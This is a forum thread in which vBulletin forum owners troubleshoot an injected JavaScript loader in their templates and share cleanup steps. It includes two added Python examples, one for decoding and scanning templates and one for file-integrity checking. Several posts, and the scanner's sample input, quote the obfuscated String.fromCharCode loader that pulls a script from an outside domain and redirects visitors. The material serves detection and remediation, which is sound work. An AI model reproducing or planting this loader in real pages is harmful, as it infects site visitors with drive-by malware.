A fix if your site is already exploited

  • Jaxo
    replied
    Just out of interest... how many people having this problem are with GoDaddy?



  • cfages
    replied
    Originally posted by Mitchh
    Code:
    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
    If you decode the numbers from the second fromCharCode() you get the following URL:



    This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus software like Avast complains about.

    I got the same problem... a secret iframe that finally leads to http://directmarketingmanage.in/in.cgi?walter ... many of my visitors' antivirus programs complained about it.

    Via phpMyAdmin I have found this code in 5 of my templates... I have also found a strange "new" file in the root of the forum (verify_ojdojdosjdsj.php) with some strange code in it (admins, if you want this file I can send it to you).

    I am under vBulletin 4.0.8 Patch Level 2 (vpublishing suite) So I will upgrade to the last version of vbulletin...

    For info I have 2 active plugins :
    - VBSEO (last version 3.6)
    - auto linker 1.1

    Blogs and CMS part of the publishing suite are disabled


    Any idea of how they came into the system? Any patch to prevent this in the future ?


    Regards
    chris

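The decoding step Mitchh and cfages describe above (turning the String.fromCharCode() argument lists back into text) is easy to automate, and automating it is how you check every template row rather than only the footer. The following Python is an added example, not code from the thread or from vBulletin: it finds each fromCharCode literal, decodes it, and reports a template as carrying the injected loader when the decoded pieces include "script" together with a remote URL. The SAMPLE_TEMPLATES dictionary is constructed for the example; the loader string inside it is the one quoted in the thread. The template names "footer" and "header" are stand-ins for whatever rows you export from the template table.

```python
import re
from typing import Dict, List

# Matches String.fromCharCode(110,117,...) with an all-numeric argument list,
# the obfuscation style used by the loader quoted in this thread.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")


def decode_fromcharcode(arg_list: str) -> str:
    """Turn '104,101,97,100' into the text those code points spell ('head')."""
    return "".join(chr(int(n)) for n in arg_list.split(","))


def find_obfuscated_strings(text: str) -> List[str]:
    """Decode every String.fromCharCode(...) literal found in text, in order."""
    return [decode_fromcharcode(m.group(1)) for m in FROMCHARCODE_RE.finditer(text)]


def loader_urls(text: str) -> List[str]:
    """The external URLs hidden in fromCharCode literals: the values to search logs and templates for."""
    return [s for s in find_obfuscated_strings(text) if s.startswith(("http://", "https://"))]


def is_remote_script_loader(text: str) -> bool:
    """True when the decoded fragments show a 'script' element being created
    and pointed at a remote URL, which is the shape of the injected footer code."""
    decoded = find_obfuscated_strings(text)
    return "script" in decoded and any(s.startswith(("http://", "https://")) for s in decoded)


def scan_templates(templates: Dict[str, str]) -> Dict[str, List[str]]:
    """Map template name -> decoded loader URLs, for every template carrying the loader."""
    return {name: loader_urls(body) for name, body in templates.items()
            if is_remote_script_loader(body)}


# Constructed sample input: the obfuscated loader quoted in this thread, placed in a
# footer template, next to a clean header template.
INJECTED_LOADER = (
    "var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));"
    "script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,"
    "46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,"
    "46,106,115);"
    "var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];"
    "head.appendChild(script);"
)
SAMPLE_TEMPLATES = {
    "footer": '<script type="text/javascript">\n<!--\n// Main vBulletin Javascript Initialization\n'
              + INJECTED_LOADER + "vBulletin_init();\n//-->\n</script>",
    "header": '<script type="text/javascript">vBulletin_init();</script>',
}

if __name__ == "__main__":
    for name, urls in scan_templates(SAMPLE_TEMPLATES).items():
        print(f"{name}: remote script loader -> {', '.join(urls)}")
```

Run it against the full export of your template table rather than one style, since cfages found the same code in five templates; any URL the scan prints is also the string to grep the rest of the file tree for.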


  • Mr Jolly
    replied
    OK, my host tells me that they removed a file called vbseo.php which they said was encoded with PHP but didn't have anything to do with vBSEO. Personally, I guessed that was a story to justify the $200 they charged me after I told them I'd managed to fix everything. But it might be relevant.

    I haven't seen this file or its contents.



  • J3rico
    replied
    Hi, same problem for me, vBulletin 4.1.11, but the problems started with 4.1.10. vBSEO has been updated with the patch released in January. I removed almost all the plugins/products (all products were updated to their latest version), deleted suspect file diagnostics, replaced any files not containing the expected contents, changed every password possible.
    In my case iframes are inserted in these files: init.php, content.php, vbulletin-core.js (this only with the 4.1.11 version).
    I put lots of rules in the .htaccess file; for 10 days there were no attacks, but since last Friday they have resumed.
    I know that it's not fair to list the installed products, however, a cross-check can be of help.
    Sorry for my bad English.

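J3rico's "replaced any files not containing the expected contents" and cfages' unexpected verify_*.php in the web root are the two things a file-integrity comparison against a pristine copy of the distribution catches. The Python below is an added example, not a vBulletin utility: it hashes a clean unpacked download and the live tree, then lists files that were modified, files that exist only on the live site, and shipped files that are missing. It assumes the site-specific settings file is includes/config.php (so it is skipped rather than reported); demo() builds two small constructed trees in a temporary directory so the example runs without a real install.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Relative paths that legitimately differ between a clean distribution and a
# live site. Assumption: site settings live in includes/config.php.
IGNORE = {"includes/config.php"}


def hash_tree(root: Path) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    digests: Dict[str, str] = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if rel in IGNORE:
            continue
        digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare_trees(clean_root: Path, live_root: Path) -> Dict[str, List[str]]:
    """Classify the live tree against the clean one.

    modified: present in both, contents differ (injected code in a shipped file)
    extra:    only on the live site (dropped files such as a backdoor)
    missing:  shipped file absent from the live site (incomplete re-upload)
    """
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "extra": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def _write(root: Path, rel: str, content: str) -> None:
    target = root / rel
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)


def demo() -> Dict[str, List[str]]:
    """Constructed sample: a clean tree beside a live tree showing the three
    conditions discussed in the thread (an edited init.php, a dropped
    verify_*.php, and a site-specific config.php that must not be reported)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp) / "clean", Path(tmp) / "live"
        for root in (clean, live):
            _write(root, "index.php", "<?php require_once('./global.php');\n")
            _write(root, "init.php", "<?php // bootstrap\n")
            _write(root, "includes/functions.php", "<?php // helpers\n")
        _write(clean, "includes/config.php", "<?php $config['Database']['dbname'] = 'forum';\n")
        _write(live, "includes/config.php", "<?php $config['Database']['dbname'] = 'myboard';\n")
        # Constructed: an injected iframe appended to init.php on the live site
        _write(live, "init.php",
               "<?php // bootstrap\necho '<iframe src=\"http://example.invalid/\"></iframe>';\n")
        # Constructed stand-in for the unexpected file cfages found in the web root
        _write(live, "verify_ojdojdosjdsj.php", "<?php /* unexpected file */\n")
        # A shipped file the re-upload never delivered
        _write(clean, "clientscript/vbulletin-core.js", "function vBulletin_init(){}\n")
        return compare_trees(clean, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Anything in "extra" that is not an attachment, an uploaded avatar, or a plugin you installed yourself deserves a look before it is deleted, because, as Zachery says later in the thread, that is where the re-entry point tends to be; copy it off the server first so it can be examined.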


  • Zachery
    replied
    Third party addons? You cleaned the damage, but did you find the source? If you move to another software and the backdoor is still in place it won't matter.

    Your addons being up-to-date helps, but it's not 100% that the problem is resolved. The addons you're running might still have issues, if the developer hasn't fixed them, or worse, doesn't know about them.



  • Joey805
    replied
    I got hit with the same bug too, cleaned it and now it's back again 1 day later. I re-uploaded all my vBulletin files, changed every password possible, made sure any plugins I am running are up to date, and they STILL got in.

    How the heck can we stop this from happening again? I'm about ready to start looking at other forum software.



  • dadoc
    replied
    Hello,

    I know that this problem has affected most versions of vBulletin.
    You guys are talking about the 4.x version but it all sounds very similar to what happened to my forum.

    I am on the old 3.x version and I am not here to tell you what the problem is or how to fix it, but

    I have been in battle with a crazy redirect which has been going on for about 2 weeks.

    It is hard to read through all the forums and see what others have said to do, and because it is an ongoing problem there are few updated fixes.

    I don't know if the problem is vBulletin or vBSEO (which I have installed, latest version).

    What fixed my problem was:

    1. Doing a full reinstall of vBSEO, all files.

    2. Changed passwords to everything, e.g. forum CP, database, cPanel, vBSEO CP and others (make sure to edit config for new passwords).

    3. Changing permissions on all config files, forum and vBSEO. I had done this via FTP but after much trial and error found that this had to be done via cPanel's file manager. Don't know why, it just worked!

    4. I could not get my warning message in my vBSEO CP to change until I did the permission change for the config file via cPanel (the message was saying that you should edit your config permissions to secure your site). Once I did, it removed the message.


    I hope this may help someone, and I am still looking into some changes that have been made to my database:
    extra tables were added, related to tags. I don't know much about these tables other than I did not create them and they were created
    about the same time as I started to have problems.

    You can have a look at a screen shot here if you want to see them



    Like I said I have no answers and don't know the cause, but this worked for me.

    Regards
    Ryan



  • CountRock
    replied
    Originally posted by Mr Jolly
    If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.
    Did what the 1st post said! Fixed for the time being.



  • Mr Jolly
    replied
    Originally posted by CountRock
    Same problem! Fixed the vBSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However I'm still getting the following JavaScript in the footer file. Re-building the footer by saving it didn't work. What can I do?

    Code:
    <script type="text/javascript">
    <!--
        // Main vBulletin Javascript Initialization
        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
    //-->
    </script>
    If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.



  • Mr Jolly
    replied
    Originally posted by Wayne Luke
    Nope... Not enough information given, no access to any of the sites with this issue. There are a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well, but most people don't even save those for more than 24 hours.
    I opened a ticket and was asked to pay $80 before you'd look at it. Then I was directed to the forums.

    I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.

    I gave vBulletin full access to my server, all the passwords they could possibly need.



  • CountRock
    replied
    Same problem! Fixed the vBSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However I'm still getting the following JavaScript in the footer file. Re-building the footer by saving it didn't work. What can I do?

    Code:
    <script type="text/javascript">
    <!--
        // Main vBulletin Javascript Initialization
        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
    //-->
    </script>



  • tagthis
    replied
    Originally posted by Diablotic
    I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

    I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
    Let us know how it goes. I've looked at the fix and for some reason I don't have a
    /vbseo/includes/functions_vbseocp_abstract.php

    file. So I can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.

    Wayne, I'll open a support ticket if it comes back again.



  • Wayne Luke
    replied
    Originally posted by tagthis
    VB - any word on finding how they're doing this?
    Nope... Not enough information given, no access to any of the sites with this issue. There are a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well, but most people don't even save those for more than 24 hours.



  • Diablotic
    replied
    I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

    I will fix it now, remove the malicious code and see if it's back again today or tomorrow.



  • tagthis
    replied
    Originally posted by Diablotic
    This is mad, I have exactly the same issue for a few days now and have no idea what is causing it. Please help.
    Open your footer template in the style you're using and then click save and close. This rebuilds the file and removes the exploit. This is however just a work around to remove it and doesn't fix the root cause.

    +1 for the same exploit.

    VB - any word on finding how they're doing this?

    We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.
